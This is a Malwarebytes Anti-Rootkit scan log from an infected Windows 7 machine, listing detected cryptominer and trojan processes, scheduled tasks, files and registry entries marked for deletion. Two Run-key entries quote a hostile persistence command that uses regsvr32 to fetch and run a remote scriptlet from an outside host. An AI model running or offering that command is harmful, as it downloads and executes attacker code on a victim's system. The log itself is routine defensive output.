Malwarebytes Anti-Rootkit BETA 1.10.3.1001
www.malwarebytes.org

Database version:
  main:    v2020.04.20.05
  rootkit: v2020.04.20.05

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.19596
Sergio :: ANDROID [administrator]

20/04/2020 15:57:27
mbar-log-2020-04-20 (15-57-27).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 231185
Time elapsed: 3 hour(s), 5 minute(s), 16 second(s)

Memory Processes Detected: 2
C:\Windows\inf\aspnet\lsma12.exe (RiskWare.BitCoinMiner) -> 1948 -> Delete on reboot. [19fc2c8e01d5b185b6a659b148bbf709]
C:\Windows\update.exe (Trojan.Downloader) -> 2532 -> Delete on reboot. [f32201b9c5113afc4b2fdb12738ec33d]

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 8
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{654B8343-C8FA-46EC-B7E7-C520C4DC2B31} (RiskWare.BitCoinMiner) -> Delete on reboot. [4bcacaf034a26fc783c46361a759b749]
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{703B071F-3CCB-48DE-A1DA-CFD8AD366F34} (Trojan.Agent.WmiBit) -> Delete on reboot. [b75e73474690b97d1cd09a29c937f907]
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa (Trojan.Agent.WmiBit) -> Delete on reboot. [1ef7a41625b1d46251cd9437ea16e020]
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa1 (Trojan.Agent.WmiBit) -> Delete on reboot. [66af8e2ce8ee00363bd1f7d45fa15ea2]
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa2 (Trojan.Agent.WmiBit) -> Delete on reboot. [e62fb802e4f2be78de2e5f6c748cb848]
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa3 (Trojan.Agent.WmiBit) -> Delete on reboot. [4ec7ffbb1eb8b08635d78744679946ba]
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ok (Trojan.Agent.Generic) -> Delete on reboot. [b4614179e7efef47a4d5f2d936cac838]
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\oka (RiskWare.BitCoinMiner) -> Delete on reboot. [2aeb209a488ee0560e6c9f2c27d99c64]

Registry Values Detected: 4
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{654B8343-C8FA-46EC-B7E7-C520C4DC2B31}|Path (RiskWare.BitCoinMiner) -> Data: \oka -> Delete on reboot. [4bcacaf034a26fc783c46361a759b749]
HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{703B071F-3CCB-48DE-A1DA-CFD8AD366F34}|Path (Trojan.Agent.WmiBit) -> Data: \Mysa -> Delete on reboot. [b75e73474690b97d1cd09a29c937f907]
HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|start (Trojan.Agent.Generic) -> Data: regsvr32 /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll -> Delete on reboot. [888d2e8c6670d85eca0ead2205fbc33d]
HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|start (Trojan.Agent.Generic) -> Data: regsvr32 /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll -> Delete on reboot. [9481ac0e993d211519bfa52a837d06fa]

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 5
C:\Windows\inf\aspnet\lsma12.exe (RiskWare.BitCoinMiner) -> Delete on reboot. [19fc2c8e01d5b185b6a659b148bbf709]
C:\Windows\update.exe (Trojan.Downloader) -> Delete on reboot. [f32201b9c5113afc4b2fdb12738ec33d]
C:\Program Files\Common Files\xpdown.dat (Trojan.Agent.E) -> Delete on reboot. [1302a8124393d462cdc167e08779916f]
C:\Windows\System32\Tasks\Mysa (Trojan.Agent.WmiBit) -> Delete on reboot. [94814e6c4b8b290d7a67236255ab01ff]
C:\Windows\System32\Tasks\oka (RiskWare.BitCoinMiner) -> Delete on reboot. [fe1748728056f0464707eb9bfe0260a0]

Physical Sectors Detected: 0
(No malicious items detected)

(end)